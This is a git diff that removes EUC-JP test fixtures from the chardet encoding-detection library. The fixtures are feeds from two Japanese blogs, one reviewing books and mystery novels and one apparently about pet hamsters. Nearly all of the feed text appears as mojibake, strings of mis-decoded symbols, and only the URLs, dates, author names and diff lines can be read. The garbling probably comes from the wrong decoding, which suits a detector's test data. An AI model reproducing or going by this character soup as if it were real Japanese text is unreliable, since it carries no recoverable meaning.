₪³₪־»‏ֲו₪־ּµּ¾»װּ±₪¿₪ֱ₪־ִּ¿®₪עµ­₪·₪¿ַע³ע¸½ס₪ֿ¡¢¥ײ¥ם¥°₪־¿¿₪־µ¯¸»₪ְ₪ָ₪µ₪ל₪ֶ₪₪₪כ¡£... -book -overQ -2005-12-31T15:44:20+09:00 - - -¡ײֹװµ₪ּ£₪־ֳ«¡׳¸½¾¡¢½₪ְµהֲ­¡´ְ¡ֻ -http://www.overcube.com/blog/archives/000678.php -ֱ°²ף₪־µ­»צ₪ַ¡¢ֹװµ₪ּ£₪־ֳ«¸½¾₪ָ₪₪₪¦₪־₪ע½ס₪₪₪¿₪־₪ַ₪¹₪¬¡¢ֵ׃ֳז₪ֲַ³₪­₪ֻ½ס₪¯₪³₪ָ₪עֻ÷₪ל₪ֶ₪·₪₪₪¡¢ּ₪ֳֿ₪ֻ₪₪ֳ₪ֶ₪·₪₪₪₪₪·₪¿(¡¨¡¦¢ֿ¡¦) ֹװµ₪ּ£₪־ֳ«¸½¾₪ָ₪ֿ¡¢ֳ«־¼»ׂ₪¬¡¢´°את₪ֻ¶ב₪ֵ₪±₪׀¶ב₪ֵ₪¯₪₪ֹ¥₪¥ה¥₪¥»¥ל¥ײ₪¿ְֽ¸₪ֻ₪₪ֳ₪ֶ₪·₪₪¦¸½¾₪ע²עְּ₪·₪¿₪ג₪־₪ַ₪¹¡ָ‏ֻֻ₪µ₪ְג¡¢÷ֲֳִֹ¸ֻח÷¹₪·¾ו₪²₪₪¹¡ֻ¡£ ₪µ₪ֶ¡¢÷£÷¢₪ֻ₪₪ֳ₪ֶ¡¢½ס₪³₪¦₪ָ»׳₪ֳ₪ֶ₪¿¡ײֲ³₪­¡׳₪ע»׳₪₪½׀₪·₪₪·₪¿¡£ ₪³₪־ַ¯ֻצ₪־₪¢₪ן₪¿₪ְ₪·₪₪»‏´₪ֻ¡¢₪¸₪ִ₪ֻ₪־₪ף₪׃₪ך₪·₪¿ֵ¸³«₪ֻ₪₪ֳ₪ֶ₪×₪ך₪₪¹¡£ ₪ַ₪ג¡¢₪»₪ֳ₪«₪¯»׳₪₪½׀₪·₪¿₪ף₪ַ¡¢¡ײֲ³₪­¡׳₪־ֶגֶֽ₪ע₪«₪₪₪ִ₪₪ף₪ַ₪´ְגְּ₪·₪ֶ₪×₪¯₪ָ¡£... -mystery -overQ -2005-12-30T11:45:26+09:00 - - -ֹװµ₪ּ£₪־ֳ« -http://www.overcube.com/blog/archives/000675.php -¥װ¡¼¥¿¡¼¡¦¥¸¥ד¥¯¥½¥ף´ִֶֶ₪־¡ײ¥­¥ף¥°¥³¥ף¥°¡׳¡£ ¥ם¡¼¥ֹ¡¦¥×¥ײ¡¦¥¶¡¦¥ך¥ף¥°¡׳₪ֻ₪ִ₪ֵ₪₪₪ֶ¡¢÷£²ף₪ג£ֳ£ַ₪¬₪¹₪´₪½₪¦¡£ ₪ֹ₪ף₪ֹ₪ף¿²½₪¹₪כ£ֳ£ַ¡ִ₪ַ₪¹₪¬¡¢ַ÷₪₪ג₪¢₪כ₪־₪ְ₪ָ₪«¡£ ֹװµ₪ּ£₪־ֳ«¸½¾¡¢₪ָ¸ֶ₪׀₪ל₪כ₪ג₪־¡£ ₪¿₪ָ₪¨₪׀¿ֽ´ײ₪ע£ֳ£ַ₪ֱַֹ₪¯¾ל¹ח¡¢¥ך¥¢¥כ₪ֻ₪₪ל₪׀₪₪כ₪₪ֹ¡¢₪₪ֻ₪«ֹװµ₪ּ£₪µ₪¬₪ֻ₪¸₪½׀₪ֶ₪¯₪כ¡£ ֳ±½ד₪ְ‏²ט₪ֱַֹ₪₪₪ֶ₪₪₪¿»‏₪ֿ¡¢₪«₪ן₪₪₪¯¥ַ¥ױ¥©¥כ¥ב₪µ₪ל₪¿¥­¥ד¥י¥¯¥¿¡¼₪ְ₪ֳ₪¿₪־₪ֻ¡¢¥ך¥¢¥כ₪¿ֽ´ײ₪ֻ¶ב₪ֵ₪¯₪ֻ₪ִ₪ל₪ֶ¡¢₪₪ף₪ְ₪«¥¾¥ף¥׃₪₪¿₪₪₪ֹװµ₪ּ£₪¼ֱ´¶₪¬₪¿₪ְ₪ט₪ֳ₪ֶ₪¯₪כ¡£ ¥ם¥¥ֳ¥ָ¹©³״₪ַ₪ֿ°ֱ°₪«₪יֳ־₪י₪ל₪כ¸½¾₪ַ¡¢ֵל¹©ֲח₪־¿¹ְ¯¹°ַמ»־₪¬1970ַ¯₪ְֻֿ¸₪עָ¯ֹ½¡£ ¿ֶ₪·₪₪ה₪¹₪µ₪ע½ִ¼´¡¢¥ך¥¢¥כ₪µ₪ע²£¼´₪ֻ¥°¥י¥ױ₪ע½ס₪¯₪ָ¡¢¥ך¥¢¥כ₪µ₪¬ֱ‎₪¹₪ֻ₪ִ₪ל₪ֶ¡¢ֵ׃ֳז₪₪ַ₪ֿ¿ֶ₪·₪₪¬ֱ‎₪¹₪־₪ְ₪±₪ל₪ֹ¡¢₪¢₪כ¥¥₪¥ף¥ָ₪ַ¥¬¥¯¥ף₪ָ¿ֶ₪·₪₪ה₪¹₪µ₪¬ֽמ₪ֱ¹‏₪א¡ײֳ«¡׳₪¬₪ַ₪­₪כ¡¢₪ָ₪₪₪¦₪ג₪־¡£ ₪₪¼₪³₪ף₪¸½¾₪¬µ¯₪­₪כ₪«¡£ ¡ײ¾נף₪־¾¯₪₪₪³¨¡׳₪ְ₪ָ¡¢¿ֽ´ײ₪־ּ₪ֿ¡¢ֹװֲ­₪·₪ֶ₪₪₪כ¾נף₪עה₪¦¡£¹¥°ױֵ×₪ֻה´°₪¹₪כ·¹¸‏₪¬₪¢₪כ¡£₪₪־₪«₪¥ז¡¼¥ָ¥װ¥¢₪עּ´¸«₪כ₪ף₪ַ₪·₪ח₪¦₪«¡£ ₪ַ₪ג¡¢¾נף־ּ₪¬¡ײ´°ֱ´¡׳₪ֻ¶ב₪ֵ₪₪₪ֶ₪¯₪כ₪ֻ₪ִ₪ל¡¢÷£ֵ₪ֿµױ₪ֻ¡ײ·ח₪±₪ֶ₪₪₪כֹפ¬¡׳₪ֻּ₪¬₪₪₪¯₪ט₪¦₪ֻ₪₪ֳ₪ֶ₪·₪₪¦¡£¥¢¥י₪¬ּ־©₪ִ¡ִ₪ָ₪₪₪¦₪³₪ָ₪י₪·₪₪₪־₪ַ₪¹¡£ £ֳ£ַ₪¬ָ¯ֳ£₪·¡¢¥²¡¼¥א¶ָ³¦₪¬₪³₪־¸½¾₪ַֻ÷₪₪µ₪ל₪ֶ₪₪₪כ¡¢₪ָ₪₪₪¦ֳֿ¡£ ÷ַ¶ב₪ֱ₪ח₪ֳ₪ֲֳָֿך₪ֻ₪₪ֳ₪ֶ₪כ₪ף₪ְ₪ָ₪«¡£ ¡תֲ³₪­₪עֻ÷₪ל₪כ ₪ַ¡¢₪³₪³₪₪ַ½ס₪₪₪ֶ¡¢µ·ֶ₪ע₪ָ₪ֳ₪¿¡£ֲ³₪­₪ֿ₪¢₪ָ₪ַ¡¢₪ָ»׳₪ֳ₪ֶ₪₪₪¿₪־₪ְ₪±₪ל₪ֹ¡¢₪µ₪ֶ²¿₪ע½ס₪¯₪ִ₪ג₪ך₪ְ₪ֳ₪¿₪«¡¢ֻ÷₪ל₪₪·₪¿(¡¨¡¦¢ֿ¡¦) ₪₪ף₪«₪ֽ¡¢÷ַ¶ב₪־½׀ֽט»צ₪ָ₪«־®¹װ₪ָ₪«₪₪₪ֳ₪¿₪³₪ָ₪ַ¡¢₪³₪־¡ײֹװµ₪ּ£₪־ֳ«¡׳¸½¾₪ָ₪ט₪¯»ק₪¿₪־₪¬₪¢₪כ₪ָ»״ֵ¦₪·₪ט₪¦₪ָ₪·₪ֶ₪¿₪ף₪ְ₪ָ»׳₪¦₪ף₪ַ₪¹₪¬¡£₪¦¡¼₪ף¡¢²¿₪ְ₪ֳ₪¿₪«¡ִ»׳₪₪₪ְ₪»₪ף¡£... -mystery -overQ -2005-12-28T23:25:11+09:00 - - - - \ No newline at end of file diff --git a/chardet/tests/EUC-JP/pinkupa.com.xml b/chardet/tests/EUC-JP/pinkupa.com.xml deleted file mode 100644 index 35a0311..0000000 --- a/chardet/tests/EUC-JP/pinkupa.com.xml +++ /dev/null @@ -1,167 +0,0 @@ - - - - - -₪װ₪ף₪¯₪ׁ -http://www.pinkupa.com/ -¼סּ£₪ַ»פ°י₪·₪ֶ₪₪₪כ¥¦¡¼¥ׁ¡¼¥כ¡¼¥ׁ¡¼(¥¢¥¥ם¡¼¥ָ¥כ)₪ה¥³¥ך¥ֹ¥י¥¹ֵש₪־ַ®ֲ׃µ₪ֻ´״₪¹₪כ´ׁ»¡ֶµ­₪ה»פ°י‎ֻ¡₪₪ֹ₪ע½ס₪­ִײ₪ֳ₪ֶ₪₪¹¡£ֲ¾₪ֻ₪ג»ה₪־ֲח¹¥₪­₪¥װ¥ף¥¯¥ֿ¥¦¥¹₪הONE PIECE(¥ן¥ף¥װ¡¼¥¹)₪־¥³¥ף¥ֶ¥ף¥ִ₪ג₪¢₪ך₪₪¹¡ִ -ja - -2006-01-01T12:01:09+09:00 - - - - - - - - - - - - - - - - - - - - - - - - - -HAPPY NEW YEAR 2006 -http://www.pinkupa.com/cgi-bin/weblog/archives/000624.php -¿·ַ¯ְּ₪±₪₪·₪ֶ₪×₪ב₪ַ₪ָ₪¦₪´₪¶₪₪₪₪¹o(*^¢¦^*)o ÷£ַ¯₪ג²¿ֲ´µ¹₪·₪¯₪×´ך₪₪₪·₪₪¹¡× ³§ֽֽ₪־₪´ֲ¿¹¬₪ע¿´₪ט₪ך₪×µ§₪ךֳ׳₪·₪₪¹¡ש ₪ַ₪ֿ¡¢²ז₪¬²ָ₪־¥¦¥ֳׁ£₪«₪י₪ג¿·ַ¯₪־₪´°§»¢₪ַ₪¹(¾׀) ₪ָ¸ְ₪¦₪³₪ָ₪ַ¡¢¥¦¥ֳׁ£¶¦¡¹ֻצ±₪¯₪ט₪ם₪·₪¯₪¥¡ֱ(o^¡¼')b ¡צֳם¡¡ְ־¡¢ָר÷ך°¡ָ‏₪µ₪ף₪¬²־₪ֳ₪ֶ₪₪₪¿¡¥¦¡¼¥ׁ¡¼¥ְ¥ף¥·¥ף¥°¡₪ָ₪₪₪¦ ¡¡¡¡¡¡²־₪־ֳז₪ַ¡¢¥ׁ¥װ₪ְ₪־¥װ¥₪ְ₪־₪ָ¥¦¥ׁ¸ל₪¬½׀₪ֶ₪­₪¿₪־₪ַ ¡¡¡¡¡¡₪½₪ל₪ע¿¿»ק₪ֶ₪₪₪·₪¿(¾׀)... -¥¦¡¼¥ׁ¡¼¥כ¡¼¥ׁ¡¼°לָּ -michiyo -2006-01-01T12:01:09+09:00 - - -ֽטַ¯₪ג₪ט₪ם₪·₪¯₪ֳ¡× -http://www.pinkupa.com/cgi-bin/weblog/archives/000623.php -÷£ַ¯₪ג»ִ₪¹₪ָ₪³₪ם₪¢₪ָ£²ֶ₪ַ₪¹₪ֽ¡£ £±ַ¯₪¬₪¢₪ֳ₪ָ₪₪₪¦´ײ₪ֻ²ב₪®µמ₪ֳ₪¿₪ֳ₪ֶ´¶₪¸₪ַ₪¹>_ ְ₪₪¥µ¥₪¥ָ₪ֻ°לַ¯´ײ₪×₪ִ₪­₪¢₪₪ִ÷₪­ֵֻצ₪ֻֽ­ֶס₪¦₪´₪¶₪₪₪₪·₪¿¡× ֽטַ¯₪ג¥¥₪¥¡¼¥¹₪ֲַ³₪±₪ֶ₪₪₪­₪₪¹₪־₪ַ ²¿ֲ´µ¹₪·₪¯₪×´ך₪₪₪·₪₪¹¡¢³§ֽֽ₪ֳo(*^¢¦^*)o ÷£ֶ₪ֿ¥¦¥ֳׁ£₪ֻ¥¨¥µ₪ע₪¢₪²₪₪·₪¿¡£ ÷£ַ¯₪־¿©₪ַ¼₪ב₪ַ₪¹(¾׀) ₪½₪ל₪«₪י¡¢₪µ₪ֳ₪­¥¥ֶ¥ָ₪־₪×´י₪ע¸«₪¿₪י ¥¢¥´₪־ֹפ¬₪¬¾¯₪·¥׳¥¯¡ֱ₪ֳ₪ָ¼נ₪ל₪ֶ₪₪₪כµ₪₪¬₪·₪₪¹>_ ֲַֻ׀₪ַ¼נ₪ל₪ֶ₪₪₪כ₪₪י₪₪₪₪₪±₪ֹ¡¢ ₪´₪₪ֱ₪ד₪ף₪־³₪־¼נ₪ל₪ֶָ±₪¸₪ַ´¶ְק¾ֹ₪¸₪ד₪₪₪ה₪ְ₪¡£ ₪ַ₪ג¡¢¸µµ₪₪ַ¥¨¥µ₪ג¥ג¥ך¥ג¥ך¿©₪₪ֶ₪×₪ך ₪´₪₪ֱ₪ד₪ף₪¬´¶ְק¾ֹ₪ֻ₪₪ֳ₪¿»‏₪ָ₪ֱֿ´ֱ³°ד₪¦₪־₪ַ ֲ¿¬¡¢¿פֶ₪ג₪¹₪ל₪׀¼נ₪ל₪ֿ₪ׂ₪¯₪ָ»׳₪₪₪₪¹¡£ ÷ַ¸ו₪ֻ¡¢¶ָּ³ֿ¢ֽם₪ַ₪¹¡× ְטֶ¡¢¥¨¥י₪־¥ױ¥µ¥ױ¥µ₪־¿§₪־·ן₪ַ¥ב¡¼¥כ₪עִ÷₪₪₪¿₪₪ֽֽ¡£ ²¿ֵ₪ג₪×ײ»צ₪ע÷¹₪·¾ו₪²₪ֶ₪₪₪כ₪־₪ַ₪¹₪¬¡¢ ¥¢¥ֹ¥ל¥¹₪¬°ד₪¦₪י₪·₪¯ּב₪ֳ₪ֶ₪­₪ֶ₪·₪₪₪₪₪¹(^_^;) ₪½₪־¸ו₪ֹ₪¦₪₪ֳ₪¿₪«¿´ַ₪₪־₪ַ¡¢₪³₪ל₪ע¸«₪ֶ₪₪₪י₪ֳ₪·₪ד₪ֳ₪¿₪י ₪´°לףִ÷₪±₪כ₪ָ¹¬₪₪₪ַ₪¹¡×¡°¡°... -¥¦¡¼¥ׁ¡¼¥כ¡¼¥ׁ¡¼°לָּ -michiyo -2005-12-30T22:28:49+09:00 - - -÷£ֶ₪־₪´₪₪ֳ₪ֱ¢צ -http://www.pinkupa.com/cgi-bin/weblog/archives/000622.php -÷£ֶ₪ֿ¥¨¥µ₪ע₪¢₪²₪ֶ¡¢½µ₪ֻ°לֵ₪־´¹¿וDay₪ַ₪·₪¿¡£ ¥¨¥µ₪ע¿©₪₪¿₪¢₪ָ¡¢´¹¿ו₪־÷ֳַז₪ג₪´₪₪ֱ₪ד₪ף₪ֿ ₪÷₪ֳ₪ָ¼«¬₪־₪×µ₪₪ֶֻ‏₪ך₪־¾ל½ך₪ַ₪¯₪ִ₪ם₪₪₪ַ₪×₪ך₪₪·₪¿¡£ ₪½₪¦¡¢₪´₪₪ֱ₪ד₪ף₪־¹¥₪­₪¾ל½ך₪ֳ₪ֶ¢­¥³¥³₪ַ₪¹(¾׀) ₪ה₪ֿ₪ך¥׳¥י¥ף¥ִ₪־¾ו₪¬¹¥₪­₪ָ₪₪¨¡¢ ִל₪ֻµן₪כ₪ט₪ך₪גֲ¿₪₪₪ף₪¸₪ד₪₪₪₪«¡©₪ֳ₪ֶ₪¯₪י₪₪₪ַ₪¹(^_^;) ־ֹ₪₪´¶₪¸₪ֻ¥ז¥י¥ז¥י₪¹₪כ₪־₪ַ¡¢₪´₪₪ֱ₪ד₪ףֵ×₪ֻ₪ֿ ³¹¥₪־ֹֽ₪ך₪«₪´¾ץֲײ₪₪־₪«₪ג₪·₪ל₪₪»₪ף(¾׀) ֽ¾ֳּ₪ַ₪¹₪¬¡ִ ÷ַ¶ב¡¢₪ה₪¿₪י¥¥כ¥ֱ¥«¥י¡¼¥·¥ך¡¼¥÷₪ֻּ¥־»₪µ₪ל ֽ₪·₪₪¡¢ֽ₪·₪₪₪ָ₪÷₪ֳ₪ָ»׳₪ֳ₪ֶ₪₪₪¿₪י¡¢ ₪₪ף₪ָ¡¢ּ´₪ֻ₪ַ₪­₪ֶ₪¿¥¦¥ׁ₪¯₪ףֳ£₪¬¥¥כ¥ֱ¥«¥י¡¼ּֽֽֿ₪ַ₪·₪¿¡×¡ַת¡ֻ ₪½₪ף₪ּ´₪ע¸«₪כ»ה₪ֿ¥¢¥₪ְ₪±₪ֹ¡ִ¥¥כ¥ֱ¥«¥י¡¼₪־¥¦¥ֳׁ£₪ֿ²ִ°¦₪«₪ֳ₪¿¡× ₪³₪ל₪«₪י₪ֿ¡¢¥ײ¥י¥ֳ¥¯¥¦¥ׁ₪ע¥¦¥ׁ¥־¥ן¡¼¥כ₪ָ¸ֶ₪׃¡¢ ¥¥ן¥₪¥ָ¥¦¥ׁ₪ע¡¢¥¦¥ׁ¥ײ¥ם¥ף₪ָ¸ֶ₪׃₪₪¹(₪ֱ₪ח₪ֳ₪ָ±³)... -¥¦¡¼¥ׁ¡¼¥כ¡¼¥ׁ¡¼°לָּ -michiyo -2005-12-28T17:54:10+09:00 - - -¼ך¡ֲ­¡ֻ·ׂ₪₪₪ַ₪כ₪· -http://www.pinkupa.com/cgi-bin/weblog/archives/000621.php -ֳח־ֹ₪·₪³₪ט₪·₪־₪־₪ך₪ֱ₪ד₪ף¡ץ₪´₪₪ֱ₪ד₪ף₪ֿ¡¢ ¥י¥ײ¥ך¡ֱ₪ֻ₪×¼ך¡¹¡ֲ­¡ֻ₪ע·ׂ₪₪₪ַ₪×₪ך₪₪·₪¿¡£ ֵצ¿ֶֽ±»־₪ֿ₪½₪¦₪ֿ»׳₪ֳ₪ֶ₪₪₪₪־₪ֵֿצֱ³₪ַ₪¹₪¬ ₪³₪ֳ₪ֱ₪¬¸«₪ֶ₪₪₪כ¬₪ֻ₪ֿ₪ב₪ֱ₪ד²ִ°¦₪₪₪ֳ¡ִ¿ֶ¥׀¥«(*^^*¡¶ ֶףֹ₪₪־ֲ­²¼₪ע¥¢¥ֳ¥׳₪ֻ₪¹₪כ₪ָ₪³₪ף₪´¶₪¸₪ַ₪¹(¾׀) ₪ֽ¡©»״₪¬ֽם₪¹ח₪ֳ₪ֶ₪₪₪ֶ¼ך₪ע·ׂ₪₪₪ַ₪כ₪₪¿₪₪₪ַ₪·₪ח¡©(^o^;) ₪³₪ל₪¬ֱ°ֲ­₪ְ₪ֳ₪¿₪י´°את₪ְ₪ֳ₪¿₪־₪ֻ₪ֳ¡×... -¥¦¡¼¥ׁ¡¼¥כ¡¼¥ׁ¡¼°לָּ -michiyo -2005-12-21T17:10:31+09:00 - - -¿ו²¹15ֵ -http://www.pinkupa.com/cgi-bin/weblog/archives/000620.php -₪«₪¡¡ֱ₪₪ך´¨₪¯₪₪ֳ₪ֶ₪­₪ֶ¡¢ ¸½÷₪־¥¦¥ֳׁ£₪־¿וֱו₪ּֿף15ֵ₪ַ₪¹¡£ ¸·ּ©₪ֻ¸ְ₪¨₪׀¡¢´ָ‏²°¿וֱו₪ָ¥¥ֶ¥ָ¿וֱו₪¬15ֵ¡£ ¥¦¥ׁ¥כ¥ׁ¿וֱו₪¬16ֵ₪ַ₪¹¡£²¿¸־₪«¥¦¥ׁ¥כ¥ׁ¿וֱו₪־‎₪¬ ₪₪₪ֳ₪ִ₪ג£±ֵ¹ג₪₪₪ַ₪¹¡£ ֵ₪ַ°לָײ´¨₪₪₪־₪ֿ£²·מ₪ְ₪ָ»׳₪₪₪₪¹₪¬ ÷£₪«₪י¿ו²¹15ֵ₪ָ₪₪₪¦₪ָ¡¢£²·מ÷¢₪ֿ₪ֹ₪־₪¯₪י₪₪₪ֻ₪₪כ₪־₪ַ₪·₪ח₪¦¡© µמַ¯₪־ֵ₪ֿ÷ִַד₪ַ₪ג¡¢14ֵ₪¯₪י₪₪₪ְ₪ֳ₪¿₪ט₪¦₪¡ִ(^_^;) 10ֵ₪ע²¼²ף₪כ₪ט₪¦₪₪י¥ׂ¡¼¥¿¡¼₪ַ₪גֶ‏₪ל₪ט₪¦₪«₪₪¡¡£ ₪ַ₪ג¡¢¼ך»‎₪ֱ₪־¥µ¡¼¥ג₪ֿ÷ִַד18ֵ₪־ְִך₪ְ₪«₪י¡¢ ₪½₪ל₪ְ₪ָ¾ו₪²₪¹₪®₪כµ₪₪ג₪¹₪כ₪·¡ִ¡£ ₪₪¡¡¢¥½¥ֱ¥¥כ¥³¸׀₪־ֵ¾ל₪־¿ו²¹₪ֿ6ֵ₪¯₪י₪₪₪ֻ²¼₪¬₪כ₪½₪¦₪₪־₪ַ ´״ֵל₪־ֵ₪¯₪י₪₪₪₪י¥ׂ¡¼¥¿¡¼ּµ₪·₪ַ₪ג¾ט₪ךְ₪ל₪כ₪«₪¡ִ₪ָ»׳₪ֳ₪ֶ₪×₪ך₪₪¹¡£ ÷£ַ¯₪ַ£³²ףּ₪־ֵ₪ַ¡¢°לֵ₪ג¥ׂ¡¼¥¿¡¼₪ֶֿ‏₪ל₪¿₪³₪ָ₪₪₪₪·¡£ ₪½₪ל₪₪ך₪ֻ³טָ¯ֵ₪ֿ²¼₪¬₪כ₪±₪ֹ¸µµ₪₪ְ₪ֳ₪¿₪·¡£ ¡¥¥ֶ¥ָ₪ֿ÷£ַ¯₪¬½י₪ב₪ֶ₪־ֵ±₪·₪ְ₪«₪יֽ׳¥ֱ¥§¥ֳ¥¯¡ֻ ₪³₪־´¨₪µ₪־ֳז¡¢ֹפ²°₪־ֳָֻ¼´ן¶ס₪ֿ°לְ»ָ₪ֳ₪ֶ₪₪₪₪־₪ַ »ה₪ֿ´¨₪¯₪ֶ´®₪ך₪₪»₪ף₪¬¡¢¥¦¥ֳׁ£₪ֿ¸µµ₪₪ֻ²ב₪´₪·₪ֶ₪₪₪₪¹(¾׀) ₪־₪ך₪ֱ₪ד₪ף₪ָ₪´₪₪ֱ₪ד₪ף₪ֿ¡¢ֶ‏₪ךֽנ₪ל₪ִֶֹ₪₪₪«₪±₪ֳ₪³¡ִ ¥¥ֶ¥ָ₪ֿ¥¿¥³װה₪ֵֻ׀₪ֳ₪ֶ₪×»³ֽ·₪׃¡©¡ִ ¥¦¥ׁ₪¯₪ף₪ֿ₪ָ₪₪±₪¿´י₪·₪ֶֶָ₪ךֽ·₪׃¡©¡ִ ₪³₪ף₪ִ´»ׂ₪ַ¡¢²ז₪¬²ָ₪־¥¦¥ֳׁ£₪ֿ₪₪ף₪¸µµ₪₪ַ₪¹¡°¡° ₪½₪½¡¢ְטֶ₪ֿ¥¥ֶ¥ָ₪ֻ³ת₪₪ל₪ֶ»ץ·ֱ¥׀¥ֳ¥ֱ¥ך₪ְ₪ֳ₪¿₪±₪ֹ ÷£ֵ₪ֿ₪´₪₪ֱ₪ד₪ף₪ֻ₪ה₪י₪ל₪₪·₪¿(¾׀) ¥¦¥ף¥ֱ₪עׂ₪ֵ₪±₪כ₪¿₪ב₪ֻ¼ך₪עֶ‏₪ל₪ֶ₪₪₪¿₪י ֿ׃₪ע¥¬¥ײ¥ך₪ֳ¡×¡×¡×¡×ִֻ₪«₪ֳ₪¿₪±₪ֹ¡¢¼«¬₪«₪י₪¹₪₪ַ´®₪¨₪¿¡× µ₪ֻ¼ך₪ע°ת₪¯₪ָ¶ֳ₪₪₪ֶ¥ׁ¥ֻ¥ֳ¥¯₪ֻ₪₪ֳ₪ֶֻ½₪ל₪כ₪«₪י(^_^;) ₪½₪ל₪ֻ₪·₪ֶ₪ג¡¢₪´₪₪ֱ₪ד₪ף₪ֿ°לֵ³ת₪₪ִ₪¯₪ָ₪₪«₪₪«₪µ₪÷ ¿וּּ₪ֻֿ׃₪ע½׀₪·₪ֶ₪ג₪₪ס¢¿©₪י₪₪ֹױ₪₪₪¿₪₪₪ײ₪כ²¼₪¬₪ֳ₪ֶ₪₪·₪¿(¾׀) ₪₪כ₪ַ¥¦¥ִׁא₪ך₪ע₪·₪ֶ₪₪₪כ₪ט₪¦₪ַ₪·₪¿(^o^;) »ה₪־ֿ׃₪ֻ₪ֿ₪·₪ֳ₪«₪ךו÷־ן₪»ץ·ֱ₪־¥«¥µ¥ײ¥¿₪¬½׀¸½₪·₪ֶ₪₪₪₪¹¡£ ³ת₪₪ל½ך₪¬°­₪₪₪ִָֻ₪₪₪־₪ַ¡¢³§₪µ₪ף₪גµ₪₪עֹױ₪±₪₪·₪ח₪¦(^_^;)... -¥¦¡¼¥ׁ¡¼¥כ¡¼¥ׁ¡¼°לָּ -michiyo -2005-12-19T16:41:45+09:00 - - -´ֵ₪¨₪ף₪₪µ₪ף -http://www.pinkupa.com/cgi-bin/weblog/archives/000619.php -¿´₪₪·₪«¡¢₪־₪ך₪ֱ₪ד₪ף₪ֻ´ֵ₪¨µ₪ּ£₪־₪´₪₪ֱ₪ד₪ף₪ַ₪¹¡£ ₪ה₪ֳ₪ׁ₪ך°¹₪µ₪ף½קֻ¼₪ה₪ֽ₪ֳ¡×(¾׀) ֶ±µן³«»ֵֿצ»‏₪ֿ¡¢₪ֱ₪ח₪ֳ₪ָ₪ַ₪ג¿¨₪ל₪י₪ל₪ט₪¦₪ג₪־₪₪י ¥ׁ¥ֻ¥ֳ¥¯₪ֻ₪₪ךֶ¨₪²²ף₪ֳ₪ֶ₪₪₪¿₪־₪ך₪ֱ₪ד₪ף₪ג ÷£₪ַ₪ֿ₪´₪₪ֱ₪ד₪ף₪ֻ¾ט₪י₪ל₪ט₪¦₪¬²¿₪µ₪ל₪ט₪¦₪¬ ֱ´₪ֶ₪עµצ₪·¼ץ₪±ֶ‏₪ל₪ֶ₪₪₪כ₪ט₪¦₪ַ₪¹¡£ֲ¿¬(^_^;) ₪½₪ף₪£²ֹ₪₪־ֳח־ֹ₪·¥·¥ח¥ֳ¥ָ₪ַ₪¹¢צ ¾ֻ»ׂ₪ֻ¿ו₪¬ֵ©₪ֳ₪¿¸ו₪¬₪¢₪ֳ₪¿₪־₪ַ ו÷־ן₪ֻ¿¡₪₪₪ֶ»£₪ךִ¾₪½₪¦₪ָ»׳₪ֳ₪¿₪י¡¢ ¿¡₪₪₪ֶ₪₪₪כ₪¦₪ֱ₪ֶֻףֹ₪₪¬־¥₪ל₪ֶ₪·₪₪ֳ₪¿¡£¼÷ַװ¡£ ֱב₪¯¥¦¥ׁ₪¯₪ף₪ָ¥¥ֶ₪ֶ₪£₪ף₪גֳח־ֹ₪·ֶ±µן₪¬ ₪ַ₪­₪כ₪ט₪¦₪ֻ₪₪ל₪׀₪₪₪₪₪₪¡¡°¡° ₪ֱ₪₪₪ֻ¡¢₪ֹ₪¦₪ה₪י¥¥ֶ¥ָ₪ֳֻֿ₪־»ׂ₪י₪·₪₪₪ַ₪¹(^o^;)... -¥¦¡¼¥ׁ¡¼¥כ¡¼¥ׁ¡¼°לָּ -michiyo -2005-12-12T17:29:19+09:00 - - -¿ַ־ֵֹפ²°₪־¹¹¿· -http://www.pinkupa.com/cgi-bin/weblog/archives/000618.php -¿ַ־ֵֹפ²°₪ֻ²¼µ­₪־£²₪ִ₪־¾ֹ־ד₪ָ¼£־ֵ־ד₪ע·ַ÷₪·₪₪·₪¿¡£ ¢£¡״÷ש²ײ₪ֱ₪ד₪ף₪־²ר²ז¡₪ע¥¢¥ֳ¥׳₪·₪₪·₪¿¡£ ¡¡¥כ¥ׁ₪¯₪ףֶ±ֽֽ¡¢·ל´ֹ₪עְֳַ₪·₪ֶ₪·₪₪₪₪₪·₪¿₪¬ ¡¡¸«»צ₪ֻ²ףֹ¡ץ´°¼£₪·₪¿÷ש²ײ¡₪µ₪¯₪י¡ֻ₪ֱ₪ד₪ף₪־¾ֹ־ד₪ָ¼£־ֵ־ד₪ַ₪¹¢צ ¡¡¾נף¡»ס־ֱ¡ִֻף¶¡₪·₪ֶ₪¯₪ְ₪µ₪ֳ₪¿₪₪₪ֱ₪³ֽֽ₪ֻ₪ֿ¿´₪ט₪ך´¶¼ױֳ׳₪·₪₪¹¡°¡° ¢£¡״¥ֱ¥ח¥ב₪ֱ₪ד₪ף₪־ֲֹµ₪¡₪ע¥¢¥ֳ¥׳₪·₪₪·₪¿¡£ ¡¡ָיֹזֲֹ₪עָ¯ֲֹ₪·₪ֶ₪·₪₪ֳ₪¿¥ֱ¥ח¥ב₪ֱ₪ד₪ף₪־¾ֹ־ד₪ָ¼£־ֵ־ד₪ַ₪¹¢צ ¡¡¾נף¡»ס־ֱ¡ִֻף¶¡₪·₪ֶ₪¯₪ְ₪µ₪ֳ₪¿₪­₪¯ֽֽ₪ֻ₪ֿ¿´₪ט₪ך´¶¼ױֳ׳₪·₪₪¹¡°¡° ÷£¸ו₪ג¿§¡¹₪¾ֹ־ד₪ָ¼£־ֵ־ד₪ע·ַ÷₪·₪ֶ₪₪₪­₪¿₪₪₪ָ»׳₪ֳ₪ֶ₪×₪ך₪₪¹¡£ »ה¼«¿ָ₪ְּֿֿ¡¢ֲ¾₪־³§ֽֽ₪ֻ₪ָ₪ֳ₪ֶ₪ג¡¢₪ג₪·₪ג₪־»‏₪ֻ₪ָ₪ֶ₪גּע־©₪ִ₪־₪ַ ֽֽ¡¹₪¥±¡¼¥¹₪ע½¸₪ב₪ֶ₪₪₪­₪¿₪₪₪ָ»׳₪ֳ₪ֶ₪₪₪₪¹¡£ ³§ֽֽ₪«₪י₪־¾נף¡¦»ס־ֱִף¶¡₪ע₪×ֲװ₪ֱ₪·₪ֶ₪×₪ך₪₪¹₪־₪ַ ²¿₪«₪´₪¶₪₪₪₪·₪¿₪י¥ב¡¼¥כ₪ה·ַ¼¨ִָ₪ַ₪×ֳ־₪י₪»²¼₪µ₪₪₪₪»¡£ ₪ֹ₪¦₪¾µ¹₪·₪¯₪×´ך₪₪₪·₪₪¹₪ֳ¡×m(__)m... -¥¦¡¼¥ׁ¡¼¥כ¡¼¥ׁ¡¼ֲֹµ₪¡¦²ר²זװ -michiyo 